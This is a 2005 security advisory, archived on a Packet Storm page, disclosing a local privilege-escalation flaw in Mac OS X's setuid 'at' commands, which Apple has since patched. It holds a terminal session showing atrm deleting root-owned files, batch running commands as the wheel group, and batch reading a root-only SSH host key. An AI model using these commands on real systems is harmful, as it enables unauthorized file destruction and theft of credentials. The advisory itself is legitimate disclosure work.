what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DMA-2005-0127a.txt

DMA-2005-0127a.txt
Posted Jan 28, 2005
Authored by Kevin Finisterre

Apple's OS X batch family of commands make poor use of setuid capabilities allowing for privilege escalation.

tags | exploit
systems | apple, osx
advisories | CVE-2005-0125
SHA-256 | 4b7f8222d4d52c294fcfe9d3930da745c276ff2c756307556f0b7f809f135083

DMA-2005-0127a.txt

Change Mirror Download
DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'
Author: Kevin Finisterre
Vendor: http://www.apple.com/macosx/
Product: * at commands <= Mac OS X v10.3.7, Mac OS X Server v10.3.7

References: (CAN-2005-0125)
http://www.digitalmunition.com/DMA[2005-0127a].txt
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0125
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html
http://docs.info.apple.com/article.html?artnum=300770
http://www.immunitysec.com/downloads/nukido.pdf
http://www.immunitysec.com/downloads/nukido.sxw

Description:
Mac OS X v10.3 Panther offers breakthroughs in innovation and ease of use that won't
be seen in other operating systems for years, if ever, while its UNIX-based core
provides rock-solid security on the Internet.

On 1/25/2005 Apple published an advisory for the "at" commands to address a local
privilege escalation vulnerability. The "at" family of commands did not properly drop
privileges. This could allow a local user to remove files not owned by them, run programs
with added privileges, or read the contents of normally unreadable files. The update
patched the commands at, atrm, batch, atq, and atrun.

The following session outlines the behavior that was reported.

Please note that at, batch, atq, atrm are all disabled by default on Mac OS X. Each
of these commands depend on the execution of atrun which has been disabled due to power
management concerns. Those who would like to use these commands, must first re-enable
/usr/libexec/atrun by removing the leading '#' from the line
#*/5 * * * * root /usr/libexec/atrun
in the file /etc/crontab.

'atrm' can be used to delete any file on the system. The atrm vulnerability does not
depend upon atrun.

CrunkJuice:~ kevinfinisterre$ id
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre),
79(appserverusr), 80(admin), 81(appserveradm)

CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r-- root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r-- 1 root wheel 214 3 Dec 20:19 /etc/hosts

CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory

'batch' can be used to execute commands as gid=0(wheel) groups=0(wheel), 1(daemon),
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test

CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory

(wait 5 minutes)

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

'batch' can also be used to read any file on the system.

CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw------- 1 root wheel 668 16 Nov 19:39 /etc/ssh_host_dsa_key

CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh

CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------ 1 kevinfin wheel 1263 3 Dec 20:31 /var/at/jobs/b011848db.000

CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
-----BEGIN DSA PRIVATE KEY-----
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s
ereethamstahenkryption
-----END DSA PRIVATE KEY-----

Apple has released patches for this vulnerability, please see the
references above.

For the protection of its customers, Apple does not disclose, discuss,
or confirm security issues until a full investigation has occurred and
any necessary patches or releases are available. Apple likes to focus
response efforts so that they have the greatest impact across
the product line, because of this they generally will not respond to
e-mail messages unless further information is needed for a security
issue.

This is timeline associated with this bug.

12/20/2004 02:22 PM - initial response
01/03/2005 09:17 PM - followup
01/12/2005 02:56 PM - ...
01/13/2005 08:41 PM - ...
01/19/2005 12:16 AM - confirm credit
01/20/2005 12:13 PM - immunitysec nukido release

-KF


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close